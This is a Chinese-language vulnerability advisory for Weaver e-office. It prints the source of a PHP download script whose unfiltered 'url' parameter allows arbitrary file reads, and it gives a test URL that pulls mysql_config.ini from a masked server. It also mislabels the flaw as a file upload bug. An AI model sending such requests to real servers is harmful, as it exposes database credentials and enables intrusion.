### 漏洞信息: 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。 泛微e-office存在任意文件上传漏洞导致敏感信息泄漏。 ### 漏洞分析: 漏洞存在于E-mobile/Data/downfile.php ``` $fileurl = $_REQUEST['url']; $sessionstr = $_REQUEST['sessionkey']; $strexplode = explode( ",", $sessionstr ); $sessionkey = $strexplode[0]; $curr_user_id = $strexplode[1]; $rooturl = "http://".$_SERVER['HTTP_HOST']; $checkurl = explode( "/", $fileurl ); if ( $checkurl[1] == "flowimg" ) { $url = $rooturl."/E-mobile/flowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else if ( $checkurl[1] == "freeflowimg" ) { $url = $rooturl."/E-mobile/flow/freeflowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else { $url = $rooturl.$fileurl; $filetype = pathinfo( $fileurl ); $type = $filetype['extension']; } if ( $type == "css" ) { header( "Content-Type: text/css" ); } else if ( $type == "js" ) { header( "Content-Type: application/javascript" ); } else if ( $type == "jpg" || $type ==...
### 漏洞信息: 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。 泛微e-office存在任意文件上传漏洞导致敏感信息泄漏。 ### 漏洞分析: 漏洞存在于E-mobile/Data/downfile.php ``` $fileurl = $_REQUEST['url']; $sessionstr = $_REQUEST['sessionkey']; $strexplode = explode( ",", $sessionstr ); $sessionkey = $strexplode[0]; $curr_user_id = $strexplode[1]; $rooturl = "http://".$_SERVER['HTTP_HOST']; $checkurl = explode( "/", $fileurl ); if ( $checkurl[1] == "flowimg" ) { $url = $rooturl."/E-mobile/flowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else if ( $checkurl[1] == "freeflowimg" ) { $url = $rooturl."/E-mobile/flow/freeflowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else { $url = $rooturl.$fileurl; $filetype = pathinfo( $fileurl ); $type = $filetype['extension']; } if ( $type == "css" ) { header( "Content-Type: text/css" ); } else if ( $type == "js" ) { header( "Content-Type: application/javascript" ); } else if ( $type == "jpg" || $type == "jpeg" || $type == "JPG" || $type == "JPEG" ) { header( "Content-Type: image/jpeg" ); } else if ( $type == "png" || $type == "PNG" ) { header( "Content-Type: image/png" ); } else if ( $type == "bmp" || $type == "BMP" ) { header( "Content-Type: image/bmp" ); } else if ( $type == "gif" || $type == "GIF" ) { header( "Content-Type: image/gif" ); } else if ( $type == "pdf" || $type == "PDF" ) { header( "Content-Type: application/pdf" ); } else if ( $type == "rar" || $type == "RAR" ) { header( "Content-Type: application/x-rar-compressed" ); } else if ( $type == "exe" || $type == "EXE" ) { header( "Content-Type: application/octet-stream" ); } else if ( $type == "zip" || $type == "ZIP" ) { header( "Content-Type: application/zip" ); } else if ( $type == "doc" || $type == "DOC" ) { header( "Content-Type: application/msword" ); } else if ( $type == "docx" || $type == "DOCX" ) { header( "Content-Type: application/msword" ); } else if ( $type == "xls" || $type == "XLS" || $type == "csv" || $type == "CSV" ) { header( "Content-Type: application/vnd.ms-excel" ); } else if ( $type == "ppt" || $type == "PPT" ) { header( "Content-Type: application/vnd.ms-powerpoint" ); } else if ( $type == "txt" || $type == "TXT" ) { header( "Content-Type: text/plain" ); } else { header( "Content-Type: application/force-download" ); } $content = file_get_contents( $url ); echo $content; ?> ``` 可以看出url参数没有有效的过滤,导致可任意文件下载。 可使用以下URl测试下载源码: ``` http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/mysql_config.ini ``` ### 解决方案: 建议关注官网网站,及时升级最新版本: http://www.weaver.com.cn/
